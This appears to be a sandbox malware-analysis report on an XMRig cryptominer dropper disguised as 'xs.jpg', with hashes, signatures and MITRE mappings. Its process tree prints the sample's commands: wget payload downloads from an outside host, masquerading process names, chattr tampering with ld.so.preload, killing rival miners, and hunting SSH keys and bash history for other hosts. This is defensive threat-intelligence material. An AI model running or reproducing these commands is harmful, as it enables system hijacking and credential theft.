xmrig | b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1

Analysis

max time kernel
31s
max time network
19s
platform
debian-9_armhf
resource
debian9-armhf-20231222-en
resource tags

arch:armhfimage:debian9-armhf-20231222-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
22-01-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

xs.jpg
Size

5KB
MD5

30f950242f01e4e8503da91dbb2d5fdc
SHA1

cb9909bebcbc056e05e74b9c3c3b33a6a7a47659
SHA256

b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1
SHA512

229364a466b0a7cdb47a3061a36336c6426ebe06a747788967080a79ebf902b41a38f4870dbc5396afbdd8b75a42273f81ed131f133ffa3be68a3bf364e4a0d2
SSDEEP

96:uou4dH1Yl9iaV4GmNdCvasvagaevagvaGvaV1FtIxH7YmJE7N7MDMtBPXSEKydtu:ndVM9iazmNdCvXvDfvZvNvW1LIxH7Ym/

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/fstream-2.dat	family_xmrig
behavioral2/files/fstream-2.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

persistence

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/etc/ld.so.preload

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/.sock	713	.sock
/usr/lib/procf/x	823	x
/usr/lib/procf/kexec	828	kexec
/usr/lib/procf/deamon-hoster	831	deamon-hoster

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	xs.jpg

Attempts to change immutable files 21 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
863	xargs
865	chattr
869	chattr
661	chattr
734	xargs
741	xargs
767	xargs
774	chattr
756	xargs
843	xargs
858	xargs
877	xargs
892	xargs
667	chattr
762	xargs
772	xargs
780	chattr
853	xargs
749	xargs
838	xargs
848	xargs

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 17 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/106/status	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/26/status	ps
File opened for reading	/proc/42/cmdline	ps
File opened for reading	/proc/633/status	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/717/stat	ps
File opened for reading	/proc/138/stat	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/745/status	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/200/cmdline	ps
File opened for reading	/proc/26/cmdline	ps
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/273/status	ps
File opened for reading	/proc/42/stat	ps
File opened for reading	/proc/827/cmdline	ps
File opened for reading	/proc/41/status	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/574/stat	ps
File opened for reading	/proc/22/status	ps
File opened for reading	/proc/760/cmdline	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/138/cmdline	ps
File opened for reading	/proc/577/stat	ps
File opened for reading	/proc/133/stat	ps
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/663/cmdline	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/639/cmdline	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/8/cmdline	ps
File opened for reading	/proc/106/cmdline	ps
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/841/cmdline	ps
File opened for reading	/proc/96/stat	ps
File opened for reading	/proc/577/cmdline	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/104/stat	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/853/cmdline	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/96/status	ps
File opened for reading	/proc/731/status	ps
File opened for reading	/proc/639/stat	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/96/stat	ps
File opened for reading	/proc/16/status	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/639/cmdline	ps
File opened for reading	/proc/657/stat	ps
File opened for reading	/proc/104/status	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/640/status	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/23/status	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.sock	wget

/tmp/xs.jpg
/tmp/xs.jpg
1⤵
- Writes DNS configuration
PID:657
- /bin/chmod
  chmod +wr /tmp
  2⤵
  PID:660
- /usr/bin/chattr
  chattr -ia /tmp
  2⤵
  - Attempts to change immutable files
  PID:661
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:667
- /bin/cat
  cat /dev/null
  2⤵
  PID:669
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/netsocketx -O /tmp/.sock
  2⤵
  - Writes file to tmp directory
  PID:679
- /bin/chmod
  chmod +x /tmp/.sock
  2⤵
  PID:694
- /bin/sleep
  sleep 1
  2⤵
  PID:696
- /usr/bin/id
  id -u
  2⤵
  PID:714
- /usr/bin/nohup
  nohup bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /usr/local/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /usr/local/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /usr/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /usr/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-armhf-20231222-en-4 -accept-tos"
  2⤵
  PID:713
- /tmp/.sock
  "[network-managerr]" "[email protected]" "-password=random#123" "-device-name=debian9-armhf-20231222-en-4" -accept-tos
  2⤵
  - Executes dropped EXE
  PID:713
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:728
- /bin/grep
  grep "\\[inet_frag_qw]"
  2⤵
  PID:730
- /bin/grep
  grep -v grep
  2⤵
  PID:731
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:733
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:734
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:737
- /bin/grep
  grep "\\[ipv6_addrconfd]"
  2⤵
  PID:738
- /bin/grep
  grep -v grep
  2⤵
  PID:739
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:740
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:741
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:744
- /bin/grep
  grep sysinit
  2⤵
  PID:745
- /bin/grep
  grep -v grep
  2⤵
  PID:746
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:747
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:749
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:751
- /bin/grep
  grep "\\[watchdodg]"
  2⤵
  PID:752
- /bin/grep
  grep -v grep
  2⤵
  PID:753
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:755
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:756
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:758
- /bin/grep
  grep "\\[bdus-daemon]"
  2⤵
  PID:759
- /bin/grep
  grep -v grep
  2⤵
  PID:760
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:761
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:762
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:763
- /bin/grep
  grep "\\[slub_flushqw]"
  2⤵
  PID:764
- /bin/grep
  grep -v grep
  2⤵
  PID:765
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:766
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:767
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:768
- /bin/grep
  grep deamon-hoster
  2⤵
  PID:769
- /bin/grep
  grep -v grep
  2⤵
  PID:770
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:772
- /usr/bin/id
  id -u
  2⤵
  PID:773
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  - Attempts to change immutable files
  PID:774
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:775
- /usr/bin/id
  id -u
  2⤵
  PID:776
- /bin/mkdir
  mkdir -p /usr/lib/procf
  2⤵
  PID:777
- /usr/bin/id
  id -u
  2⤵
  PID:778
- /bin/chmod
  chmod +w /usr/lib/procf
  2⤵
  PID:779
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  - Attempts to change immutable files
  PID:780
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:781
- /bin/mkdir
  mkdir /usr/lib/procf
  2⤵
  PID:782
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/x4 -O /usr/lib/procf/x
  2⤵
  PID:784
- /bin/chmod
  chmod +x /usr/lib/procf/x
  2⤵
  PID:807
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kexec2 -O /usr/lib/procf/kexec
  2⤵
  PID:810
- /bin/chmod
  chmod +x /usr/lib/procf/kexec
  2⤵
  PID:818
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kc -O /usr/lib/procf/deamon-hoster
  2⤵
  PID:820
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster
  2⤵
  PID:821
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster /usr/lib/procf/kexec /usr/lib/procf/x
  2⤵
  PID:822
- /usr/bin/nohup
  nohup bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /bin/sleep
  sleep 3
  2⤵
  PID:824
- /usr/local/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /usr/local/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /usr/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /usr/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:823
- /usr/lib/procf/x
  "[ipv6_addrconfd]"
  2⤵
  - Executes dropped EXE
  PID:823
- /usr/bin/nohup
  nohup bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /bin/sleep
  sleep 3
  2⤵
  PID:829
- /usr/local/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /usr/local/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /usr/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /usr/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:828
- /usr/lib/procf/kexec
  "[bdus-daemon]"
  2⤵
  - Executes dropped EXE
  PID:828
- /usr/bin/nohup
  nohup /usr/lib/procf/deamon-hoster
  2⤵
  PID:831
- /bin/sleep
  sleep 5
  2⤵
  PID:832
- /usr/lib/procf/deamon-hoster
  /usr/lib/procf/deamon-hoster
  2⤵
  - Executes dropped EXE
  PID:831
- - /bin/sleep
    sleep 3
    3⤵
    PID:833
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:834
- - /bin/grep
    grep -v grep
    3⤵
    PID:835
- - /bin/grep
    grep miner
    3⤵
    PID:836
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:837
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:838
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:839
- - /bin/grep
    grep -v grep
    3⤵
    PID:840
- - /bin/grep
    grep gitlabw
    3⤵
    PID:841
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:842
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:843
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:844
- - /bin/grep
    grep -v grep
    3⤵
    PID:845
- - /bin/grep
    grep xmp
    3⤵
    PID:846
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:847
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:848
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:849
- - /bin/grep
    grep -v grep
    3⤵
    PID:850
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:851
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:852
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:853
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:854
- - /bin/grep
    grep -v grep
    3⤵
    PID:855
- - /bin/grep
    grep khnug
    3⤵
    PID:856
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:857
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:858
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:859
- - /bin/grep
    grep -v grep
    3⤵
    PID:860
- - /bin/grep
    grep Linux2
    3⤵
    PID:861
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:862
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:863
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:870
- - /bin/grep
    grep -v grep
    3⤵
    PID:871
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:873
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:875
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:877
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:887
- - /bin/grep
    grep -v grep
    3⤵
    PID:889
- - /bin/grep
    grep kkssl
    3⤵
    PID:890
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:891
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:892
- - /bin/ps
    ps aux
    3⤵
    PID:899
- - /bin/grep
    grep -v grep
    3⤵
    PID:900
- - /bin/grep
    grep cnrig
    3⤵
    PID:902
- /usr/bin/chattr
  chattr -ia /usr/lib/procf/kexec
  2⤵
  - Attempts to change immutable files
  PID:865
- /bin/rm
  rm -f /usr/lib/procf/kexec
  2⤵
  PID:867
- /usr/bin/chattr
  chattr +i /usr/lib/procf
  2⤵
  - Attempts to change immutable files
  PID:869

/bin/ps
ps -ef
1⤵
- Reads CPU attributes
PID:672

/bin/grep
grep "\\[network-managerr]"
1⤵
PID:673

/bin/grep
grep -v grep
1⤵
PID:674

/usr/bin/wc
wc -l
1⤵
PID:676

/bin/hostname
hostname
1⤵
PID:715

/bin/ps
ps -ef
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:720

/bin/grep
grep "\\[ipv6_addrconfd]"
1⤵
PID:721

/bin/grep
grep -v grep
1⤵
PID:722

/usr/bin/wc
wc -l
1⤵
PID:723

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "id_rsa*"
1⤵
PID:874

/bin/grep
grep -vw pub
1⤵
PID:876

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:882

/bin/grep
grep IdentityFile
1⤵
PID:883

/usr/bin/awk
awk -F IdentityFile "{print \$2 }"
1⤵
PID:884

/usr/bin/find
find /root/ /root /home -maxdepth 3 -name "*.pem"
1⤵
PID:886

/usr/bin/uniq
uniq
1⤵
PID:888

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:894

/bin/grep
grep HostName
1⤵
PID:895

/usr/bin/awk
awk -F HostName "{print \$2}"
1⤵
PID:896

/bin/cat
cat /root/.bash_history "/home/*/.bash_history" /root/.bash_history
1⤵
PID:898

/bin/grep
grep -E "(ssh|scp)"
1⤵
PID:901

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:903

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.sock

Filesize
4.8MB

MD5
4d8715bb2c7517397c16bf26ed37d94c

SHA1
13008ed64e17838d554810aeea0d69421d536c48

SHA256
022b20a909b9c615beb3b819f94ceb65faae971aa284f3f9aa1b3ec36c47305a

SHA512
641e4e63ffcaab8df96da393c8eca8968a8943c84cb5b491e0b283a20acfc6e8eca54ae67b4cf5a376e099bab311a6b55d8e039652ac757d7f6b0b36587c65b5

Download Submit
/usr/lib/procf/deamon-hoster

Filesize
1KB

MD5
8eea56f798cb270e1d4ecc5e79d2d7f8

SHA1
4c028cc1afc3011da62e9ceee713799d72bb1115

SHA256
4c95865dfc6b392259c3094d036888acd3cd414177b223ac035fcc7d37a3cacc

SHA512
b8487e3b55d279c6ca5aaea742da40bd443da1fe2c69537bead71ca44cb558aa2fc6c3a675960a340271e3028d1df7dea3c9d977c72b3b5c87824108eec19a65

Download Submit
/usr/lib/procf/kexec

Filesize
2.2MB

MD5
e98e2fcb3775dac28084c17ff7282101

SHA1
644806fd5384ebb6e60de312db5ae46599aa1620

SHA256
c9604d952fca83f94b39b519f18c31fee62389ba5256ed3a4d46341ac3920f0e

SHA512
f2fa7cec3e7b6d6b85023fd91d9bd8b73eb25cc68212cf56715d2d596ad2a817be7649164a36e10347c80c79e8978b6d9f96fb2e74d2993bd8b424004399b184

Download Submit
/usr/lib/procf/x

Filesize
4.2MB

MD5
cbfb7029442d082c53f8ff6515fff255

SHA1
2fd4556d65e1c07a2d9a5c9bc31d24744c911ade

SHA256
c588dd57e6dea7180e3ae68abe0ddc6fcdb593795b9fa0dfded8388428d55dde

SHA512
fd5cb1a0cf84a80f64eb095be70634acf68195fd527eea7cbfc751a2989e5062c4c9e55f98108a5b94635e4cb61be2f90d912f349d16b41846b05278ec6df91e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads